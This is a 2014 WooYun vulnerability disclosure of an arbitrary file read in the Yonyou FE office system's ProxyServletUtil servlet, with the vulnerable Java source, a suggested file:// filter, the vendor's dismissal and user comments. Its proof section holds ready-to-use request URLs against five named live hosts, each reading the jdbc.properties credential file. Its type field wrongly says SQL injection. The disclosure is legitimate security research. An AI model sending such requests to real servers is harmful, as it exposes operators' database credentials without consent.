当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082455

漏洞标题:用友FE协作办公系统FILE协议文件读取漏洞(通杀全版本)

相关厂商:用友软件

漏洞作者: error

提交时间:2014-11-07 22:40

修复时间:2014-11-12 22:42

公开时间:2014-11-12 22:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-07: 细节已通知厂商并且等待厂商处理中
2014-11-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

用友FE协作办公系统某处协议处理接口未过滤file://协议,导致任意文件读取漏洞,通杀全版本

详细说明:

web.xml有如下配置:
<servlet>
<servlet-name>ProxyServletUtil</servlet-name>
<servlet-class>fe.witmanage.service.ProxyServletUtil</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>ProxyServletUtil</servlet-name>
<url-pattern>/ProxyServletUtil</url-pattern>
</servlet-mapping>

0.PNG


ProxyServletUtil.java源码如下:
/* */ public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException
/* */ {
/* 23 */ String urlString = request.getParameter("url");
/* 24 */ writeResponse(response, urlString);
/* */ }
/* */
/* */ private void writeResponse(HttpServletResponse response, String urlString) throws ServletException {
/* */ try {
/* 29 */ URL url = new URL(urlString);
/* 30 */ URLConnection urlConnection = url.openConnection();
/* 31 */ response.setContentType(urlConnection.getContentType());
/* 32 */ InputStream ins = urlConnection.getInputStream();
/* 33 */ OutputStream outs = response.getOutputStream();
/* 34 */ byte[] buffer = new byte[this.READ_BUFFER_SIZE];
/* 35 */ int bytesRead = 0;
/* 36 */ while ((bytesRead = ins.read(buffer, 0, this.READ_BUFFER_SIZE)) != -1) {
/* 37 */ outs.write(buffer, 0, bytesRead);
/* */ }
/* 39 */ System.out.println(outs);
/* 40 */ outs.flush();
/* 41 */ outs.close();
/* 42 */ ins.close();
/* */ } catch (Exception e) {
/* */ try {
/* 45 */ response.sendError(500, e.getMessage());
/* */ } catch (IOException ioe) {
/* 47 */ throw new ServletException(ioe);
/* */ }
/* */ }
/* */ }
/* */ }

1.png


url参数可控并且无任何过滤,导致任意文件,由于代码逻辑,进行文件读取时需要使用file://协议来利用

漏洞证明:

(1)http://oa.hzuf.com:9090/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties 

1.png


(2)http://fsd2014.f3322.org:9090/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties

2.png


(3)http://183.129.249.246:9090/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties

3.png


(4)http://218.205.208.22:9090/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties

4.png


(5)http://120.196.116.3:7321/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties

5.png

修复方案:

file://协议过滤

版权声明:转载请注明来源 error@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-11-12 22:42

厂商回复:

最新状态:

2014-11-20:各位大黑阔、白帽子小伙伴,非常感谢大家对用友产品的关注。需要说明的是,"FE协作办公平台"早已不在用友产品体系,乃是“珠海飞企软件有限公司”所有。还请各位小伙伴明察。


漏洞评价:

评论

  1. 2014-11-08 08:27 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

  2. 2014-11-08 08:43 | abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)

    一声叹息

  3. 2014-11-12 23:47 | 老胖子 ( 路人 | Rank:0 漏洞数:3 )

    大牛

  4. 2014-11-13 09:05 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    了解

  5. 2014-12-16 11:40 | Fire ant ( 实习白帽子 | Rank:73 漏洞数:26 | 他们回来了................)

    我觉得怎么爆路径是个问题.........